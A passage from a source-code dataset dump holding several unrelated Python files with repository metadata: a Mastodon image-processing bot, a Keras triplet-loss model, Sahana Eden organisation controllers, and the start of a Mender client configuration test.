)
def processToot(toot, username, replyTo, bold):
hasMedia = False
if hasattr(toot, 'media_attachments'):
for media in toot.media_attachments:
hasMedia = True
fileName = str(media['id'])
mediaType = media['type']
mediaUrl = media['url']
if mediaType == 'image':
hasMedia = True
response = requests.get(mediaUrl).content
nparr = numpy.frombuffer(response, numpy.uint8)
image = cv2.imdecode(nparr,cv2.IMREAD_UNCHANGED)
if mediaUrl.lower().find('jpg') != -1 or mediaUrl.lower().find('png') != -1:
newImage, hasSeenTheLightInImage = imageUtils.processImage(image, bold)
if hasSeenTheLightInImage:
cv2.imwrite(os.path.join(dirname, f'processed/' + fileName + '.jpg'), newImage)
logger.info(f'Success, reply to {toot.id}')
media_ids = []
res = mastodon.media_post(media_file=os.path.join(dirname, f'processed/{fileName}.jpg'),)
media_ids.append(res.id)
try:
mastodon.status_post(
status='I have seen the light! @' + username,
in_reply_to_id=replyTo,
media_ids=media_ids
)
except:
e = sys.exc_info()[0]
logger.error(e)
else:
logger.info(f'No highlights detected {toot.id}')
try:
mastodon.status_post(
status='I cannot see the light in this picture. @' + username,
in_reply_to_id=replyTo
)
except:
e = sys.exc_info()[0]
logger.error(e)
else:
logger.info(f'Not supported format for {mediaUrl}')
if mediaType == 'video' or mediaType == 'gifv':
video = requests.get(mediaUrl, allow_redirects=True)
open(os.path.join(dirname, f'processed/{fileName}.mp4'), 'wb').write(video.content)
pathToVideo = videoUtils.processVideo(
os.path.join(dirname, f'processed/{fileName}.mp4'),
fileName,
os.path.join(dirname, f'processed'),
bold
)
media_ids = []
res = mastodon.media_post(media_file=pathToVideo)
media_ids.append(res.id)
try:
mastodon.status_post(
status='I have seen the light! @' + username,
in_reply_to_id=replyTo,
media_ids=media_ids
)
except:
e = sys.exc_info()[1]
print(e)
logger.error(e)
return hasMedia
return hasMedia
def checkMentions(mastodon, keywords, sinceId):
logger.info(f'Retrieving mentions since {sinceId}')
newSinceId = int(sinceId)
try:
notifications = mastodon.notifications(since_id=sinceId, mentions_only=True)
except:
e = sys.exc_info()[0]
logger.error(e)
return newSinceId
for notification in notifications:
if notification['type'] == 'mention':
newSinceId = max(notification.id, newSinceId)
username = notification.status.account.username
replyTo = notification.status.id
if any(keyword in notification.status.content.lower() for keyword in keywords):
logger.info(f'Answering to {username} {replyTo}')
bold = '/bold' in notification.status.content.lower()
if bold:
print('Bold image requested')
# check if actual toot has media
try:
toot = mastodon.status(replyTo)
replyToot = None
hasMedia = processToot(toot, username, replyTo, bold)
# check if toot is in reply to
if hasMedia is False and hasattr(toot, 'in_reply_to_id'):
print('original toot has no media, proceed to check if replied toot exists')
replyToot = mastodon.status(toot.in_reply_to_id)
if replyToot is not None:
hasMedia = processToot(replyToot, username, replyTo, bold)
except:
e = sys.exc_info()[0]
logger.error(e)
return newSinceId
if not os.path.isfile(os.path.join(dirname, 'sinceId_mastodon.txt')):
with open(os.path.join(dirname, 'sinceId_mastodon.txt'), 'w') as saveFile:
saveFile.write('1')
while True:
with open(os.path.join(dirname, 'sinceId_mastodon.txt'), 'r') as readFile:
sinceId = readFile.read()
sinceId = int(sinceId)
sinceId = checkMentions(mastodon, ['light', 'sparkles'], sinceId)
with open(os.path.join(dirname, 'sinceId_mastodon.txt'), 'w') as saveFile:
saveFile.write(str(sinceId))
logger.info('Waiting...')
time.sleep(120) | 4,849 | 0 | 46 |
d15b9cab2300f96393dedc3c96fb1d23b15f600a | 4,613 | py | Python | models/triplet.py | leafvmaple/name_disambiguation | c0007bb85330b509fa6a1bd2975a0e609b092e02 | [
"MIT"
] | 1 | 2020-07-17T05:58:47.000Z | 2020-07-17T05:58:47.000Z | models/triplet.py | leafvmaple/name_disambiguation | c0007bb85330b509fa6a1bd2975a0e609b092e02 | [
"MIT"
] | null | null | null | models/triplet.py | leafvmaple/name_disambiguation | c0007bb85330b509fa6a1bd2975a0e609b092e02 | [
"MIT"
] | null | null | null | import numpy as np
from keras import backend as K
from keras.models import Model, model_from_json
from keras.layers import Dense, Input, Lambda
from keras.optimizers import Adam
from sklearn.metrics import roc_auc_score
from utility.triplet import l2Norm, euclidean_distance, triplet_loss, accuracy
from utility.model import predict
| 37.504065 | 125 | 0.635162 | import numpy as np
from keras import backend as K
from keras.models import Model, model_from_json
from keras.layers import Dense, Input, Lambda
from keras.optimizers import Adam
from sklearn.metrics import roc_auc_score
from utility.triplet import l2Norm, euclidean_distance, triplet_loss, accuracy
from utility.model import predict
class GlobalTripletModel:
def __init__(self, dimension=100):
self.model = None
self.dimension = dimension
self.create()
def create(self):
emb_anchor = Input(shape=(self.dimension, ), name='anchor_input')
emb_pos = Input(shape=(self.dimension, ), name='pos_input')
emb_neg = Input(shape=(self.dimension, ), name='neg_input')
# shared layers
layer1 = Dense(128, activation='relu', name='first_emb_layer')
layer2 = Dense(64, activation='relu', name='last_emb_layer')
norm_layer = Lambda(l2Norm, name='norm_layer', output_shape=[64])
encoded_emb = norm_layer(layer2(layer1(emb_anchor)))
encoded_emb_pos = norm_layer(layer2(layer1(emb_pos)))
encoded_emb_neg = norm_layer(layer2(layer1(emb_neg)))
pos_dist = Lambda(euclidean_distance, name='pos_dist')([encoded_emb, encoded_emb_pos])
neg_dist = Lambda(euclidean_distance, name='neg_dist')([encoded_emb, encoded_emb_neg])
def cal_output_shape(input_shape):
shape = list(input_shape[0])
assert len(shape) == 2 # only valid for 2D tensors
shape[-1] *= 2
return tuple(shape)
stacked_dists = Lambda(
lambda vects: K.stack(vects, axis=1),
name='stacked_dists',
output_shape=cal_output_shape
)([pos_dist, neg_dist])
self.model = Model([emb_anchor, emb_pos, emb_neg], stacked_dists, name='triple_siamese')
self.model.compile(loss=triplet_loss, optimizer=Adam(lr=0.01), metrics=[accuracy])
# inter_layer = Model(inputs=self.model.get_input_at(0), outputs=self.model.get_layer('norm_layer').get_output_at(0))
def fit(self, data):
triplets_count = data["anchor_input"].shape[0]
self.model.fit(data, np.ones((triplets_count, 2)), batch_size=64, epochs=5, shuffle=True, validation_split=0.2)
def get_inter(self, paper_embs):
get_activations = K.function(self.model.inputs[:1] + [K.learning_phase()], [self.model.layers[5].get_output_at(0), ])
activations = get_activations([paper_embs, 0])
return activations[0]
def full_auc(self, test_triplets):
embs_anchor = test_triplets["anchor_input"]
embs_pos = test_triplets["pos_input"]
embs_neg = test_triplets["neg_input"]
inter_embs_anchor = self.get_inter(embs_anchor)
inter_embs_pos = self.get_inter(embs_pos)
inter_embs_neg = self.get_inter(embs_neg)
accs = []
accs_before = []
for i, e in enumerate(inter_embs_anchor):
if i % 10000 == 0:
print('test', i)
emb_anchor = e
emb_pos = inter_embs_pos[i]
emb_neg = inter_embs_neg[i]
test_embs = np.array([emb_pos, emb_neg])
emb_anchor_before = embs_anchor[i]
emb_pos_before = embs_pos[i]
emb_neg_before = embs_neg[i]
test_embs_before = np.array([emb_pos_before, emb_neg_before])
predictions = predict(emb_anchor, test_embs)
predictions_before = predict(emb_anchor_before, test_embs_before)
acc_before = 1 if predictions_before[0] < predictions_before[1] else 0
acc = 1 if predictions[0] < predictions[1] else 0
accs_before.append(acc_before)
accs.append(acc)
grnd = [0, 1]
grnds += grnd
preds += predictions
preds_before += predictions_before
auc_before = roc_auc_score(grnds, preds_before)
auc = roc_auc_score(grnds, preds)
print('test accuracy before', np.mean(accs_before))
print('test accuracy after', np.mean(accs))
print('test AUC before', auc_before)
print('test AUC after', auc)
return auc
def save(self, path):
with open(path + ".json", 'w') as f:
f.write(self.model.to_json())
f.close()
self.model.save_weights(path + "-triplets-{}.h5".format(self.dimension))
def load(self, path):
with open(path + ".json", 'r') as f:
self.model = model_from_json(f.read())
f.close()
self.model.load_weights(path + "-triplets-{}.h5".format(self.dimension))
| 4,061 | 4 | 211 |
5337f46cba30d2be87fc1ebdfa5eed1b33e39d99 | 18,425 | py | Python | controllers/org.py | andygimma/eden | 716d5e11ec0030493b582fa67d6f1c35de0af50d | [
"MIT"
] | 1 | 2019-08-20T16:32:33.000Z | 2019-08-20T16:32:33.000Z | controllers/org.py | andygimma/eden | 716d5e11ec0030493b582fa67d6f1c35de0af50d | [
"MIT"
] | null | null | null | controllers/org.py | andygimma/eden | 716d5e11ec0030493b582fa67d6f1c35de0af50d | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
"""
Organization Registry - Controllers
"""
module = request.controller
resourcename = request.function
if not settings.has_module(module):
raise HTTP(404, body="Module disabled: %s" % module)
# -----------------------------------------------------------------------------
def index():
""" Module's Home Page """
module_name = settings.modules[module].name_nice
response.title = module_name
item = None
if settings.has_module("cms"):
table = s3db.cms_post
_item = db(table.module == module).select(table.id,
table.body,
limitby=(0, 1)).first()
if _item:
if s3_has_role(ADMIN):
item = DIV(XML(_item.body),
BR(),
A(T("Edit"),
_href=URL(c="cms", f="post",
args=[_item.id, "update"],
vars={"module":module}),
_class="action-btn"))
else:
item = XML(_item.body)
elif s3_has_role(ADMIN):
item = DIV(H2(module_name),
A(T("Edit"),
_href=URL(c="cms", f="post", args="create",
vars={"module":module}),
_class="action-btn"))
if not item:
#item = H2(module_name)
# Just redirect to the Facilities Map
redirect(URL(f="facility", args=["map"]))
# tbc
report = ""
response.view = "index.html"
return dict(item=item, report=report)
# -----------------------------------------------------------------------------
def sector():
""" RESTful CRUD controller """
# Pre-processor
s3.prep = prep
return s3_rest_controller()
# -----------------------------------------------------------------------------
def subsector():
""" RESTful CRUD controller """
return s3_rest_controller()
# -----------------------------------------------------------------------------
def site():
"""
RESTful CRUD controller
- used by S3SiteAutocompleteWidget(), which doesn't yet support filtering
to just updateable sites
"""
# Pre-processor
s3.prep = prep
return s3_rest_controller()
# -----------------------------------------------------------------------------
def sites_for_org():
"""
Used to provide the list of Sites for an Organisation
- used in User Registration
"""
try:
org = request.args[0]
except:
result = current.xml.json_message(False, 400, "No Org provided!")
else:
table = s3db.org_site
query = (table.organisation_id == org)
records = db(query).select(table.id,
table.name,
orderby=table.name)
result = records.json()
finally:
response.headers["Content-Type"] = "application/json"
return result
# -----------------------------------------------------------------------------
def site_org_json():
"""
Provide the Org(s) belonging to a Site
- unused?
"""
table = s3db.org_site
otable = s3db.org_organisation
query = (table.site_id == request.args[0]) & \
(table.organisation_id == otable.id)
records = db(query).select(otable.id,
otable.name)
response.headers["Content-Type"] = "application/json"
return records.json()
# -----------------------------------------------------------------------------
def facility_marker_fn(record):
"""
Function to decide which Marker to use for Facilities Map
@ToDo: Use Symbology
"""
table = db.org_facility_type
types = record.facility_type_id
if isinstance(types, list):
rows = db(table.id.belongs(types)).select(table.name)
else:
rows = db(table.id == types).select(table.name)
types = [row.name for row in rows]
# Use Marker in preferential order
if "Hub" in types:
marker = "warehouse"
elif "Medical Clinic" in types:
marker = "hospital"
elif "Food" in types:
marker = "food"
elif "Relief Site" in types:
marker = "asset"
elif "Residential Building" in types:
marker = "residence"
#elif "Shelter" in types:
# marker = "shelter"
else:
# Unknown
marker = "office"
if settings.has_module("req"):
# Colour code by open/priority requests
reqs = record.reqs
if reqs == 3:
# High
marker = "%s_red" % marker
elif reqs == 2:
# Medium
marker = "%s_yellow" % marker
elif reqs == 1:
# Low
marker = "%s_green" % marker
mtable = db.gis_marker
try:
marker = db(mtable.name == marker).select(mtable.image,
mtable.height,
mtable.width,
cache=s3db.cache,
limitby=(0, 1)
).first()
except:
marker = db(mtable.name == "office").select(mtable.image,
mtable.height,
mtable.width,
cache=s3db.cache,
limitby=(0, 1)
).first()
return marker
# -----------------------------------------------------------------------------
def facility():
""" RESTful CRUD controller """
# Pre-processor
s3.prep = prep
s3.postp = postp
output = s3_rest_controller(rheader=s3db.org_rheader)
return output
# -----------------------------------------------------------------------------
def facility_type():
""" RESTful CRUD controller """
return s3_rest_controller()
# -----------------------------------------------------------------------------
def office_type():
""" RESTful CRUD controller """
return s3_rest_controller()
# -----------------------------------------------------------------------------
def organisation_type():
""" RESTful CRUD controller """
return s3_rest_controller()
# -----------------------------------------------------------------------------
def organisation():
""" RESTful CRUD controller """
# Defined in the Model for use from Multiple Controllers for unified menus
return s3db.org_organisation_controller()
# -----------------------------------------------------------------------------
def org_search():
"""
Organisation REST controller
- limited to just search.json for use in Autocompletes
- allows differential access permissions
"""
s3.prep = lambda r: r.representation == "json" and \
r.method == "search"
return s3_rest_controller(module, "organisation")
# -----------------------------------------------------------------------------
# -----------------------------------------------------------------------------
def office():
""" RESTful CRUD controller """
# Defined in the Model for use from Multiple Controllers for unified menus
return s3db.org_office_controller()
# -----------------------------------------------------------------------------
def person():
""" Person controller for AddPersonWidget """
s3.prep = prep
return s3_rest_controller("pr", "person")
# -----------------------------------------------------------------------------
def room():
""" RESTful CRUD controller """
return s3_rest_controller()
# -----------------------------------------------------------------------------
def mailing_list():
""" RESTful CRUD controller """
tablename = "pr_group"
table = s3db[tablename]
# Only groups with a group_type of 5
response.s3.filter = (table.group_type == 5)
table.group_type.writable = False
table.group_type.readable = False
table.name.label = T("Mailing List Name")
s3.crud_strings[tablename] = s3.pr_mailing_list_crud_strings
# define the list_fields
list_fields = s3db.configure(tablename,
list_fields = ["id",
"name",
"description",
])
# Components
_rheader = s3db.pr_rheader
_tabs = [(T("Organisation"), "organisation/"),
(T("Mailing List Details"), None),
]
if len(request.args) > 0:
_tabs.append((T("Members"), "group_membership"))
if "viewing" in request.vars:
tablename, record_id = request.vars.viewing.rsplit(".", 1)
if tablename == "org_organisation":
table = s3db[tablename]
_rheader = s3db.org_rheader
_tabs = []
s3db.add_component("pr_group_membership", pr_group="group_id")
rheader = lambda r: _rheader(r, tabs = _tabs)
return s3_rest_controller("pr",
"group",
rheader=rheader)
# -----------------------------------------------------------------------------
def donor():
""" RESTful CRUD controller """
tablename = "org_donor"
table = s3db[tablename]
tablename = "org_donor"
s3.crud_strings[tablename] = Storage(
title_create = ADD_DONOR,
title_display = T("Donor Details"),
title_list = T("Donors Report"),
title_update = T("Edit Donor"),
title_search = T("Search Donors"),
subtitle_create = T("Add New Donor"),
label_list_button = T("List Donors"),
label_create_button = ADD_DONOR,
label_delete_button = T("Delete Donor"),
msg_record_created = T("Donor added"),
msg_record_modified = T("Donor updated"),
msg_record_deleted = T("Donor deleted"),
msg_list_empty = T("No Donors currently registered"))
s3db.configure(tablename, listadd=False)
output = s3_rest_controller()
return output
# -----------------------------------------------------------------------------
def req_match():
""" Match Requests for Sites """
return s3db.req_match()
# -----------------------------------------------------------------------------
def incoming():
"""
Incoming Shipments for Sites
@unused
"""
return inv_incoming()
# END =========================================================================
| 34.633459 | 102 | 0.449335 | # -*- coding: utf-8 -*-
"""
Organization Registry - Controllers
"""
module = request.controller
resourcename = request.function
if not settings.has_module(module):
raise HTTP(404, body="Module disabled: %s" % module)
# -----------------------------------------------------------------------------
def index():
""" Module's Home Page """
module_name = settings.modules[module].name_nice
response.title = module_name
item = None
if settings.has_module("cms"):
table = s3db.cms_post
_item = db(table.module == module).select(table.id,
table.body,
limitby=(0, 1)).first()
if _item:
if s3_has_role(ADMIN):
item = DIV(XML(_item.body),
BR(),
A(T("Edit"),
_href=URL(c="cms", f="post",
args=[_item.id, "update"],
vars={"module":module}),
_class="action-btn"))
else:
item = XML(_item.body)
elif s3_has_role(ADMIN):
item = DIV(H2(module_name),
A(T("Edit"),
_href=URL(c="cms", f="post", args="create",
vars={"module":module}),
_class="action-btn"))
if not item:
#item = H2(module_name)
# Just redirect to the Facilities Map
redirect(URL(f="facility", args=["map"]))
# tbc
report = ""
response.view = "index.html"
return dict(item=item, report=report)
# -----------------------------------------------------------------------------
def sector():
""" RESTful CRUD controller """
# Pre-processor
def prep(r):
# Location Filter
s3db.gis_location_filter(r)
return True
s3.prep = prep
return s3_rest_controller()
# -----------------------------------------------------------------------------
def subsector():
""" RESTful CRUD controller """
return s3_rest_controller()
# -----------------------------------------------------------------------------
def site():
"""
RESTful CRUD controller
- used by S3SiteAutocompleteWidget(), which doesn't yet support filtering
to just updateable sites
"""
# Pre-processor
def prep(r):
if r.representation != "json" or \
r.method != "search":
return False
# Location Filter
s3db.gis_location_filter(r)
return True
s3.prep = prep
return s3_rest_controller()
# -----------------------------------------------------------------------------
def sites_for_org():
"""
Used to provide the list of Sites for an Organisation
- used in User Registration
"""
try:
org = request.args[0]
except:
result = current.xml.json_message(False, 400, "No Org provided!")
else:
table = s3db.org_site
query = (table.organisation_id == org)
records = db(query).select(table.id,
table.name,
orderby=table.name)
result = records.json()
finally:
response.headers["Content-Type"] = "application/json"
return result
# -----------------------------------------------------------------------------
def site_org_json():
"""
Provide the Org(s) belonging to a Site
- unused?
"""
table = s3db.org_site
otable = s3db.org_organisation
query = (table.site_id == request.args[0]) & \
(table.organisation_id == otable.id)
records = db(query).select(otable.id,
otable.name)
response.headers["Content-Type"] = "application/json"
return records.json()
# -----------------------------------------------------------------------------
def facility_marker_fn(record):
"""
Function to decide which Marker to use for Facilities Map
@ToDo: Use Symbology
"""
table = db.org_facility_type
types = record.facility_type_id
if isinstance(types, list):
rows = db(table.id.belongs(types)).select(table.name)
else:
rows = db(table.id == types).select(table.name)
types = [row.name for row in rows]
# Use Marker in preferential order
if "Hub" in types:
marker = "warehouse"
elif "Medical Clinic" in types:
marker = "hospital"
elif "Food" in types:
marker = "food"
elif "Relief Site" in types:
marker = "asset"
elif "Residential Building" in types:
marker = "residence"
#elif "Shelter" in types:
# marker = "shelter"
else:
# Unknown
marker = "office"
if settings.has_module("req"):
# Colour code by open/priority requests
reqs = record.reqs
if reqs == 3:
# High
marker = "%s_red" % marker
elif reqs == 2:
# Medium
marker = "%s_yellow" % marker
elif reqs == 1:
# Low
marker = "%s_green" % marker
mtable = db.gis_marker
try:
marker = db(mtable.name == marker).select(mtable.image,
mtable.height,
mtable.width,
cache=s3db.cache,
limitby=(0, 1)
).first()
except:
marker = db(mtable.name == "office").select(mtable.image,
mtable.height,
mtable.width,
cache=s3db.cache,
limitby=(0, 1)
).first()
return marker
# -----------------------------------------------------------------------------
def facility():
""" RESTful CRUD controller """
# Pre-processor
def prep(r):
# Location Filter
s3db.gis_location_filter(r)
if r.interactive:
if r.component:
cname = r.component.name
if cname in ("inv_item", "recv", "send"):
# Filter out items which are already in this inventory
s3db.inv_prep(r)
# remove CRUD generated buttons in the tabs
s3db.configure("inv_inv_item",
create=False,
listadd=False,
editable=False,
deletable=False,
)
elif cname == "human_resource":
# Filter to just Staff
s3.filter = (s3db.hrm_human_resource.type == 1)
# Make it clear that this is for adding new staff, not assigning existing
s3.crud_strings.hrm_human_resource.label_create_button = T("Add New Staff Member")
# Cascade the organisation_id from the office to the staff
htable = s3db.hrm_human_resource
field = htable.organisation_id
field.default = r.record.organisation_id
field.writable = False
field.comment = None
# Filter out people which are already staff for this office
s3_filter_staff(r)
elif cname == "req" and r.method not in ("update", "read"):
# Hide fields which don't make sense in a Create form
# inc list_create (list_fields over-rides)
s3db.req_create_form_mods()
elif r.id:
field = r.table.obsolete
field.readable = field.writable = True
elif r.method == "map":
# Tell the client to request per-feature markers
s3db.configure("org_facility", marker_fn=facility_marker_fn)
elif r.representation == "geojson":
# Load these models now as they'll be needed when we encode
mtable = s3db.gis_marker
s3db.configure("org_facility", marker_fn=facility_marker_fn)
return True
s3.prep = prep
def postp(r, output):
if r.representation == "plain" and \
r.method !="search":
# Custom Map Popup
output = TABLE()
append = output.append
# Edit button
append(TR(TD(A(T("Edit"),
_target="_blank",
_id="edit-btn",
_href=URL(args=[r.id, "update"])))))
# Name
append(TR(TD(B("%s:" % T("Name"))),
TD(r.record.name)))
# Type
if r.record.facility_type_id:
append(TR(TD(B("%s:" % r.table.facility_type_id.label)),
TD(r.table.facility_type_id.represent(r.record.facility_type_id))))
# Comments
if r.record.comments:
append(TR(TD(B("%s:" % r.table.comments.label)),
TD(r.record.comments)))
# Organization (better with just name rather than Represent)
# @ToDo: Make this configurable - some deployments will only see
# their staff so this is a meaningless field
table = s3db.org_organisation
query = (table.id == r.record.organisation_id)
org = db(query).select(table.name,
limitby=(0, 1)).first()
if org:
append(TR(TD(B("%s:" % r.table.organisation_id.label)),
TD(org.name)))
# Requests link to the Site_ID
site_id = r.record.site_id
# Open/High/Medium priority Requests
rtable = s3db.req_req
query = (rtable.site_id == site_id) & \
(rtable.fulfil_status != 2) & \
(rtable.priority.belongs((2, 3)))
reqs = db(query).select(rtable.id,
rtable.req_ref,
rtable.type,
)
if reqs:
append(TR(TD(B("%s:" % T("Requests")))))
req_types = {1:"req_item",
3:"req_skill",
8:"",
9:"",
}
vals = [A(req.req_ref,
_href=URL(c="req", f="req",
args=[req.id, req_types[req.type]])) for req in reqs]
for val in vals:
append(TR(TD(val, _colspan=2)))
gtable = s3db.gis_location
stable = s3db.org_site
query = (gtable.id == stable.location_id) & \
(stable.id == site_id)
location = db(query).select(gtable.addr_street,
limitby=(0, 1)).first()
# Street address
if location.addr_street:
append(TR(TD(B("%s:" % gtable.addr_street.label)),
TD(location.addr_street)))
# Opening Times
opens = r.record.opening_times
if opens:
append(TR(TD(B("%s:" % r.table.opening_times.label)),
TD(opens)))
# Phone number
contact = r.record.contact
if contact:
append(TR(TD(B("%s:" % r.table.contact.label)),
TD(contact)))
# Phone number
phone1 = r.record.phone1
if phone1:
append(TR(TD(B("%s:" % r.table.phone1.label)),
TD(phone1)))
# Email address (as hyperlink)
email = r.record.email
if email:
append(TR(TD(B("%s:" % r.table.email.label)),
TD(A(email, _href="mailto:%s" % email))))
# Website (as hyperlink)
website = r.record.website
if website:
append(TR(TD(B("%s:" % r.table.website.label)),
TD(A(website, _href=website))))
return output
s3.postp = postp
output = s3_rest_controller(rheader=s3db.org_rheader)
return output
# -----------------------------------------------------------------------------
def facility_type():
""" RESTful CRUD controller """
return s3_rest_controller()
# -----------------------------------------------------------------------------
def office_type():
""" RESTful CRUD controller """
return s3_rest_controller()
# -----------------------------------------------------------------------------
def organisation_type():
""" RESTful CRUD controller """
return s3_rest_controller()
# -----------------------------------------------------------------------------
def organisation():
""" RESTful CRUD controller """
# Defined in the Model for use from Multiple Controllers for unified menus
return s3db.org_organisation_controller()
# -----------------------------------------------------------------------------
def org_search():
"""
Organisation REST controller
- limited to just search.json for use in Autocompletes
- allows differential access permissions
"""
s3.prep = lambda r: r.representation == "json" and \
r.method == "search"
return s3_rest_controller(module, "organisation")
# -----------------------------------------------------------------------------
def organisation_list_represent(l):
organisation_represent = s3db.org_organisation_represent
if l:
max = 4
if len(l) > max:
count = 1
for x in l:
if count == 1:
output = organisation_represent(x)
elif count > max:
return "%s, etc" % output
else:
output = "%s, %s" % (output, organisation_represent(x))
count += 1
else:
return ", ".join([organisation_represent(x) for x in l])
else:
return NONE
# -----------------------------------------------------------------------------
def office():
""" RESTful CRUD controller """
# Defined in the Model for use from Multiple Controllers for unified menus
return s3db.org_office_controller()
# -----------------------------------------------------------------------------
def person():
""" Person controller for AddPersonWidget """
def prep(r):
if r.representation != "s3json":
# Do not serve other representations here
return False
else:
s3mgr.show_ids = True
return True
s3.prep = prep
return s3_rest_controller("pr", "person")
# -----------------------------------------------------------------------------
def room():
""" RESTful CRUD controller """
return s3_rest_controller()
# -----------------------------------------------------------------------------
def mailing_list():
""" RESTful CRUD controller """
tablename = "pr_group"
table = s3db[tablename]
# Only groups with a group_type of 5
response.s3.filter = (table.group_type == 5)
table.group_type.writable = False
table.group_type.readable = False
table.name.label = T("Mailing List Name")
s3.crud_strings[tablename] = s3.pr_mailing_list_crud_strings
# define the list_fields
list_fields = s3db.configure(tablename,
list_fields = ["id",
"name",
"description",
])
# Components
_rheader = s3db.pr_rheader
_tabs = [(T("Organisation"), "organisation/"),
(T("Mailing List Details"), None),
]
if len(request.args) > 0:
_tabs.append((T("Members"), "group_membership"))
if "viewing" in request.vars:
tablename, record_id = request.vars.viewing.rsplit(".", 1)
if tablename == "org_organisation":
table = s3db[tablename]
_rheader = s3db.org_rheader
_tabs = []
s3db.add_component("pr_group_membership", pr_group="group_id")
rheader = lambda r: _rheader(r, tabs = _tabs)
return s3_rest_controller("pr",
"group",
rheader=rheader)
# -----------------------------------------------------------------------------
def donor():
""" RESTful CRUD controller """
tablename = "org_donor"
table = s3db[tablename]
tablename = "org_donor"
s3.crud_strings[tablename] = Storage(
title_create = ADD_DONOR,
title_display = T("Donor Details"),
title_list = T("Donors Report"),
title_update = T("Edit Donor"),
title_search = T("Search Donors"),
subtitle_create = T("Add New Donor"),
label_list_button = T("List Donors"),
label_create_button = ADD_DONOR,
label_delete_button = T("Delete Donor"),
msg_record_created = T("Donor added"),
msg_record_modified = T("Donor updated"),
msg_record_deleted = T("Donor deleted"),
msg_list_empty = T("No Donors currently registered"))
s3db.configure(tablename, listadd=False)
output = s3_rest_controller()
return output
# -----------------------------------------------------------------------------
def req_match():
""" Match Requests for Sites """
return s3db.req_match()
# -----------------------------------------------------------------------------
def incoming():
"""
Incoming Shipments for Sites
@unused
"""
return inv_incoming()
# END =========================================================================
| 7,351 | 0 | 154 |
b3f2a2368437d0b7be4bea6c4d8c9ddf78a836c9 | 8,893 | py | Python | tests/unit/test_config.py | pasinskim/mender-python-client | d6f3dc86ec46b0b249a112c5037bea579266e649 | [
"Apache-2.0"
] | null | null | null | tests/unit/test_config.py | pasinskim/mender-python-client | d6f3dc86ec46b0b249a112c5037bea579266e649 | [
"Apache-2.0"
] | 21 | 2021-03-05T07:43:48.000Z | 2022-03-21T11:19:23.000Z | tests/unit/test_config.py | pasinskim/mender-python-client | d6f3dc86ec46b0b249a112c5037bea579266e649 | [
"Apache-2.0"
] | null | null | null | # Copyright 2021 Northern.tech AS
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import json
import logging as log
import os
import pytest
import mender.config.config as config
GLOBAL_TESTDATA = {
"InventoryPollIntervalSeconds": 200,
"RootfsPartA": "/dev/hda2",
"RootfsPartB": "/dev/hda3",
"ServerURL": "https://hosted.mender.io",
"TenantToken": """eyJhbGciOiJSUzI1NiIsInR5cCI6IkpXVCJ9.eyJtZW5k
ZXIudGVuYW50IjoiNTllMGIwNzA3ZDZmMGQwMGYwYzFmZTM4IiwiaXNzIjoiTWVuZ
GVyIiwic3ViIjoiNTllMGIwNzA3ZDZmMGQwMGYwYzFmZTM4In0.uAw2KPrwH6DPT
2ZnDLm4p6lZPlIDbK07QA2I4qcWrLQ7R-WVEuQSx4WmlXYPAgRGU0zeOPiRW-i9_faoY
56tJuLA2-DRMPcoQTn9kieyu8eCB60-gMg10RPa_XCwTAIot8eBjUSPSxjTvFm0pZ3N8
GeBi412EBUw_N2ZVsdto4bhivOZHzJwS5qZoRrCY15_5qa6-9lVbSWVZdzAjoruZKteH
a_KSGtDdg_586QZRzDUXH-kwhItkDJz5LlyiWXpVpk3f4ujX8iwk-u42WBwYbuWN4g
Ti4mNozX4tR_C9OgE-Xf3vmFkIBc_JfJeNUxsp-rPKERDrVxA_sE2l0OVoEZzcquw3c
df2ophsIFIu7scEWavKjZlmEm_VB6vZVfy1NtMkq1xJnrzssJf-eDYti-CJM3E6lSsO
_OmbrDbLa4-bxl8GJjRNH86LX6UOxjgatxaZyKEZhDG-gK6_f57c7MiA0KglOGuA
GNWAxI8A7jyOqKOvY3iemL9TvbKpoIP""",
}
LOCAL_TESTDATA = {
"InventoryPollIntervalSeconds": 100,
"UpdatePollIntervalSeconds": 100,
"RetryPollIntervalSeconds": 100,
}
@pytest.fixture(scope="session", name="local_and_global")
@pytest.fixture(scope="session", name="global_only")
@pytest.fixture(scope="session", name="local_only")
@pytest.fixture(scope="session", name="local_priority")
| 41.948113 | 96 | 0.732261 | # Copyright 2021 Northern.tech AS
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import json
import logging as log
import os
import pytest
import mender.config.config as config
GLOBAL_TESTDATA = {
"InventoryPollIntervalSeconds": 200,
"RootfsPartA": "/dev/hda2",
"RootfsPartB": "/dev/hda3",
"ServerURL": "https://hosted.mender.io",
"TenantToken": """eyJhbGciOiJSUzI1NiIsInR5cCI6IkpXVCJ9.eyJtZW5k
ZXIudGVuYW50IjoiNTllMGIwNzA3ZDZmMGQwMGYwYzFmZTM4IiwiaXNzIjoiTWVuZ
GVyIiwic3ViIjoiNTllMGIwNzA3ZDZmMGQwMGYwYzFmZTM4In0.uAw2KPrwH6DPT
2ZnDLm4p6lZPlIDbK07QA2I4qcWrLQ7R-WVEuQSx4WmlXYPAgRGU0zeOPiRW-i9_faoY
56tJuLA2-DRMPcoQTn9kieyu8eCB60-gMg10RPa_XCwTAIot8eBjUSPSxjTvFm0pZ3N8
GeBi412EBUw_N2ZVsdto4bhivOZHzJwS5qZoRrCY15_5qa6-9lVbSWVZdzAjoruZKteH
a_KSGtDdg_586QZRzDUXH-kwhItkDJz5LlyiWXpVpk3f4ujX8iwk-u42WBwYbuWN4g
Ti4mNozX4tR_C9OgE-Xf3vmFkIBc_JfJeNUxsp-rPKERDrVxA_sE2l0OVoEZzcquw3c
df2ophsIFIu7scEWavKjZlmEm_VB6vZVfy1NtMkq1xJnrzssJf-eDYti-CJM3E6lSsO
_OmbrDbLa4-bxl8GJjRNH86LX6UOxjgatxaZyKEZhDG-gK6_f57c7MiA0KglOGuA
